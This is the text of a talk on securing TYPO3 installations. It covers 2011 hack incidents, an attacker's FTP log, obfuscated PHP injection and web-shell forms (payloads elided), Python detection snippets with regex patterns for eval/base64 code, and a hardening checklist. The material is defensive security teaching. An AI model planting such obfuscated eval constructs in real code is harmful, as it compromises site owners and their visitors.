How to Secure TYPO3 Installations




How to Secure TYPO3 Installations Jochen Weiland

April 2011: the "Viagra Hack". Searching for "Viagra" in Google lists unrelated pages.

Example

"Exclusive: Many TYPO3 Sites have been hacked" (April 27, 2011): a vulnerability in TYPO3 apparently allows attackers to modify websites so that visitors coming from a Google search are directed to pharmacy sites.

July 2011: Data Theft at a Retailer Chain. Message left by the attackers on the homepage: "I will buy my iced tea now at somewhere else. I now have 'secured' the servers :) Hacked in 5 mins, got 2 million customer data sets, morons. Nobody feels responsible ;)"

July 2011: Data Theft at a Political Party. Message left by the attackers on the server: "A reasonably up-to-date TYPO3 version would have made this attack impossible, an up-to-date PHP version would have made it more difficult and having a look at Munin from time to time would have been an advantage. You are now facing the cost that you have saved in the past years not updating your IT."

A few years ago... (image: www.flickr.com/photos/light_arted/3157290392/)

"Script kiddies" defacing websites (image: www.flickr.com/photos/joshuadelaughter/2878302498)

Motivation: fun, honor

Today:

Organized crime. Goals: data theft, identity theft, fraud. Method: hacking websites.

Goals in detail:
Distribute malware
Fraud via phishing
Spying on data
Send spam
Attack websites and servers (DDoS)
Manipulate search results
Offer illegal downloads

Is TYPO3 insecure?

Examples of malicious code

Code injected into index.php and index.html: an obfuscated PHP one-liner of the form eval(gzinflate(base64_decode('...'))), which decompresses and executes a hidden payload on every request.


Web Shell

Web Shell: an obfuscated PHP file of the form eval(base64_decode("...")), whose decoded payload gives the attacker a command interface on the server.


How does the Code get onto my Server?

1. FTP. The server's FTP transfer log (client IP, D = download / U = upload, transferred bytes, flag, path): the same client fetches each file and writes a larger, modified version back.

61.100.6.41 D 2826 0 /muster/index.php
61.100.6.41 U 4699 0 /muster/index.php
61.100.6.41 D 82 0 /projekt1/ksk/index.php
61.100.6.41 U 1955 0 /projekt1/ksk/index.php
61.100.6.41 D 88 0 /projekt1/schlecker/index.php
61.100.6.41 U 1961 0 /projekt1/schlecker/index.php
61.100.6.41 D 149 0 /projekt1/typo3conf/index.html
61.100.6.41 U 215 0 /projekt1/typo3conf/index.html
61.100.6.41 D 9078 0 /projekt1/typo3conf/localconf.php
61.100.6.41 U 10951 1 /projekt1/typo3conf/localconf.php
61.100.6.41 D 76210 0 /projekt1/typo3conf/temp_cached_ps1390_ext_localconf.php
61.100.6.41 U 78077 2 /projekt1/typo3conf/temp_cached_ps1390_ext_localconf.php
61.100.6.41 D 61643 0 /projekt1/typo3conf/temp_cached_psfa20_ext_localconf.php
61.100.6.41 U 63516 1 /projekt1/typo3conf/temp_cached_psfa20_ext_localconf.php
61.100.6.41 D 843 0 /projekt1/typo3temp/rtehtmlarea/abouteditor_compressed.js
61.100.6.41 U 930 0 /projekt1/typo3temp/rtehtmlarea/abouteditor_compressed.js
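A small log analysis in the spirit of the slide, added here as an example (not part of the original talk): it pairs each download with the following upload of the same file by the same client and counts the size deltas, so a mass modification like the one above stands out. The sample log is constructed in the same format; reading D as download and U as upload is an assumption.

```python
import re
from collections import Counter

# Constructed sample in the shape of the FTP transfer log quoted above:
# <client ip> <D|U> <bytes> <flag> <path>.  Reading D as download and U as
# upload is an assumption; the 4th column is left uninterpreted.
SAMPLE_LOG = """\
61.100.6.41 D 2826 0 /muster/index.php
61.100.6.41 U 4699 0 /muster/index.php
61.100.6.41 D 149 0 /projekt1/typo3conf/index.html
61.100.6.41 U 215 0 /projekt1/typo3conf/index.html
61.100.6.41 D 9078 0 /projekt1/typo3conf/localconf.php
61.100.6.41 U 10951 1 /projekt1/typo3conf/localconf.php
192.0.2.7 U 512 0 /fileadmin/user_upload/images/logo.png
garbage line that does not parse
"""

LINE_RE = re.compile(r"^(\S+)\s+([DU])\s+(\d+)\s+(\d+)\s+(\S+)$")


def parse_log(text):
    """Return (ip, direction, size, path) tuples; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ip, direction, size, _flag, path = m.groups()
            entries.append((ip, direction, int(size), path))
    return entries


def find_modified_uploads(entries):
    """Flag files a client downloaded and then uploaded again.

    Fetch, modify, write back is how injected code lands in index.php and
    localconf.php; the size delta is the number of bytes that were added.
    """
    last_download = {}  # (ip, path) -> size of the most recent download
    hits = []
    for ip, direction, size, path in entries:
        key = (ip, path)
        if direction == "D":
            last_download[key] = size
        elif key in last_download:
            hits.append({"ip": ip, "path": path,
                         "before": last_download.pop(key), "after": size})
    return hits


def repeated_deltas(hits):
    """Count size deltas: the same delta on many files means the same payload
    was appended to each of them."""
    return Counter(h["after"] - h["before"] for h in hits)


if __name__ == "__main__":
    for h in find_modified_uploads(parse_log(SAMPLE_LOG)):
        print(h)
```

In the full log above most uploads are exactly 1873 bytes larger than the download that preceded them, which is what repeated_deltas surfaces.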


filezilla-project.org, on storing FTP passwords in its settings file: "It's not a bug it's a design decision. The settings files are stored in a directory that can only be read by your user account and nobody else. If an attacker can read that file he already has full access to anything."

FTP Configuration Text fileadmin/user_upload/images

2. Security Flaws

How to secure TYPO3 Installations?

Restrict Access to Files

Use Secure Passwords. Is this a secure password? Xt3!vM8-

Use Secure Passwords:
9 or more characters
Mixed upper/lowercase, special characters
Do not use the same password everywhere
Use a password manager
Passwords are stored as an MD5 hash, but... an unsalted MD5 hash can be looked up in reverse tables, e.g. md5.rednoize.com

Extension checkmysite (available in the TER):
Analyze index.php for malicious code
Notify the administrator via e-mail
Put a "Maintenance" message on the website
Redirect to another site
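A check along the lines of what checkmysite does for index.php, written here as an added Python example rather than the extension's own code: it flags the eval/base64/gzinflate constructs shown on the earlier slides and compares the file against a stored fingerprint. The clean and infected index.php samples are constructed.

```python
import hashlib
import re

# Patterns typical of the injected code shown on the slides: eval() wrapped
# around base64_decode()/gzinflate(), long base64 literals, and the short
# "<?" open tag used by the injected one-liner.
SUSPICIOUS_PATTERNS = [
    ("eval_of_decoded_payload",
     re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    ("base64_decode_call", re.compile(r"base64_decode\s*\(", re.I)),
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/=\s]{200,}['\"]")),
    ("short_open_tag", re.compile(r"<\?(?!php|=|xml)")),
]


def scan_php_source(source):
    """Return (pattern name, line number) for every suspicious construct found."""
    findings = []
    for name, pattern in SUSPICIOUS_PATTERNS:
        for m in pattern.finditer(source):
            findings.append((name, source.count("\n", 0, m.start()) + 1))
    return findings


def fingerprint(source):
    """SHA-256 of the file as deployed; record it again after every verified update."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def check_index(source, known_good_fingerprint):
    """Run both checks the way a monitoring extension would: any change
    against the stored fingerprint or any pattern hit raises an alert."""
    findings = scan_php_source(source)
    changed = fingerprint(source) != known_good_fingerprint
    return {"changed": changed, "findings": findings,
            "alert": changed or bool(findings)}


# Constructed stand-in for a clean TYPO3 front-end index.php.
CLEAN_INDEX = ("<?php\n"
               "// constructed stand-in for a TYPO3 index.php\n"
               "require 'typo3/sysext/cms/tslib/index_ts.php';\n")
# Constructed infected variant: the one-liner is prepended, payload replaced by filler.
INJECTED_INDEX = "<? eval(gzinflate(base64_decode('" + "A" * 300 + "'))); ?>\n" + CLEAN_INDEX
KNOWN_GOOD = fingerprint(CLEAN_INDEX)

if __name__ == "__main__":
    print(check_index(INJECTED_INDEX, KNOWN_GOOD))
```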

Check List:
Keep your software up-to-date: browser, TYPO3, extensions, server
Do not use FTP
Do not store passwords in applications
Create backups (offsite storage)
Subscribe to the TYPO3-announce mailing list
Remove software that is not needed

Questions?